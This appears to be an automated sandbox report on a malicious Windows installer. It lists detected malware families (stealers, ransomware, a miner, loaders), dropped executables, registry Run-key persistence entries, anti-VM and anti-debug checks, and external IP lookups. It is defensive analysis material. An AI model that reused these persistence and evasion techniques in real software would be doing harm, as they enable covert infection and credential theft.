memory/3048-291-0x0000000001F96000-0x0000000001FB5000-memory.dmp

memory/1996-292-0x0000000000965000-0x0000000000966000-memory.dmp

memory/948-294-0x0000000001C00000-0x0000000001C01000-memory.dmp

memory/2108-295-0x0000000000000000-mapping.dmp

memory/1264-296-0x0000000000000000-mapping.dmp

memory/1036-298-0x0000000000000000-mapping.dmp

memory/856-299-0x0000000000000000-mapping.dmp

memory/856-302-0x00000000002A0000-0x00000000002F7000-memory.dmp

memory/2568-303-0x0000000000000000-mapping.dmp

memory/2604-304-0x0000000000000000-mapping.dmp

memory/1052-306-0x0000000000000000-mapping.dmp

memory/1264-307-0x0000000000400000-0x0000000002B6B000-memory.dmp

memory/2120-308-0x0000000000000000-mapping.dmp

memory/2156-310-0x0000000000000000-mapping.dmp

memory/2120-312-0x0000000000400000-0x0000000002B6B000-memory.dmp

memory/2296-314-0x0000000000000000-mapping.dmp

memory/1208-316-0x0000000000000000-mapping.dmp

memory/1780-327-0x00000000003C0000-0x00000000003F0000-memory.dmp

memory/1780-328-0x0000000000400000-0x000000000179A000-memory.dmp

memory/1780-329-0x0000000005AE1000-0x0000000005AE2000-memory.dmp

memory/1780-331-0x0000000005AE3000-0x0000000005AE4000-memory.dmp

memory/1780-330-0x0000000005AE2000-0x0000000005AE3000-memory.dmp

memory/1780-332-0x0000000005AE4000-0x0000000005AE6000-memory.dmp

memory/1964-335-0x0000000004790000-0x0000000004791000-memory.dmp

memory/2660-338-0x0000000003060000-0x000000000317B000-memory.dmp

memory/2448-339-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2532-343-0x00000000002B0000-0x0000000000340000-memory.dmp

memory/2532-344-0x0000000000400000-0x00000000017C8000-memory.dmp

memory/2028-347-0x00000000021D0000-0x00000000022A2000-memory.dmp

memory/2536-348-0x0000000000400000-0x00000000004D5000-memory.dmp

memory/2636-351-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2724-352-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2432-357-0x0000000005160000-0x0000000005161000-memory.dmp

memory/1528-359-0x0000000000220000-0x0000000000224000-memory.dmp

memory/1528-360-0x0000000000400000-0x0000000001788000-memory.dmp

memory/2272-363-0x0000000000400000-0x0000000002BC5000-memory.dmp

memory/2272-362-0x00000000002C0000-0x0000000000391000-memory.dmp

memory/1480-368-0x00000000002E0000-0x0000000000370000-memory.dmp

memory/1480-369-0x0000000000400000-0x000000000218C000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win7-de

Max time kernel

804s

Max time network

1815s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

Signatures

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba Payload

Description Indicator Process Target
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

xmrig

miner xmrig

Checks for common network interception software

evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\SysWOW64\WerFault.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19f84b58b3d7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-HVCO3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\ProgramData\2567193.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\305459.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
N/A N/A C:\ProgramData\129133.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udptest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-95LFV.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\ProgramData\7027501.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp N/A
N/A N/A C:\ProgramData\4182401.exe N/A
N/A N/A C:\ProgramData\7858017.exe N/A
N/A N/A C:\ProgramData\6616075.exe N/A
N/A N/A C:\ProgramData\4643831.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4D1VC.tmp\postback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\ProgramData\1127203.exe N/A
N/A N/A C:\ProgramData\6947003.exe N/A
N/A N/A C:\ProgramData\129133.exe N/A
N/A N/A C:\ProgramData\4643831.exe N/A
N/A N/A C:\Program Files\7-Zip\CGHDWDWKCK\ultramediaburner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\36-beef0-53e-096b8-92a5ea06293eb\Tizhisharusi.exe N/A
N/A N/A C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\49-cda23-fed-71fa2-ceb1c2164969f\Kokevicika.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NfmfL2gcY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EuFzlktjj.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3E2B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3E2B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\81FF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3E2B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3E2B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\l0gin2iz.nv2\anyname.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xzzaftf0.huv\GcleanerEU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kpda1oo1.i40\gcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\7535ac09-7701-4fd9-972f-2396592d31c2\build2.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\678D.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\678D.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat1946eb84e6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS82683714\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-HVCO3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-HVCO3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-HVCO3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\305459.exe N/A
N/A N/A C:\ProgramData\305459.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-HVCO3.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\129133.exe N/A
N/A N/A C:\ProgramData\129133.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\305459.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\ProgramData\305459.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Vaehaexavosho.exe\"" C:\Windows\SysWOW64\WerFault.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b8b16c17-1e37-4bc4-b764-dc2032a9e9cf\\3E2B.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\3E2B.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\678D.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\1ycragm0.zlv\installer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\678D.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Defender\Vaehaexavosho.exe C:\Windows\SysWOW64\WerFault.exe N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-HTCN0.tmp C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp N/A
File created C:\Program Files\7-Zip\CGHDWDWKCK\ultramediaburner.exe.config C:\Windows\SysWOW64\WerFault.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-UVJFD.tmp C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp N/A
File created C:\Program Files\7-Zip\CGHDWDWKCK\ultramediaburner.exe C:\Windows\SysWOW64\WerFault.exe N/A
File created C:\Program Files (x86)\Windows Defender\Vaehaexavosho.exe.config C:\Windows\SysWOW64\WerFault.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\FarLabUninstaller\is-8VC3P.tmp C:\Users\Admin\AppData\Local\Temp\is-H0SA9.tmp\setup_2.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-M97F2.tmp\ultramediaburner.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f799f5f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAA07.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDBF5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI30BB.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f799f5b.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICEEB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB711.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC103.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1FE8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI47E6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI868D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9B08.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC69F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f799f5d.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID649.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICD04.tmp C:\Windows\system32\msiexec.exe N/A
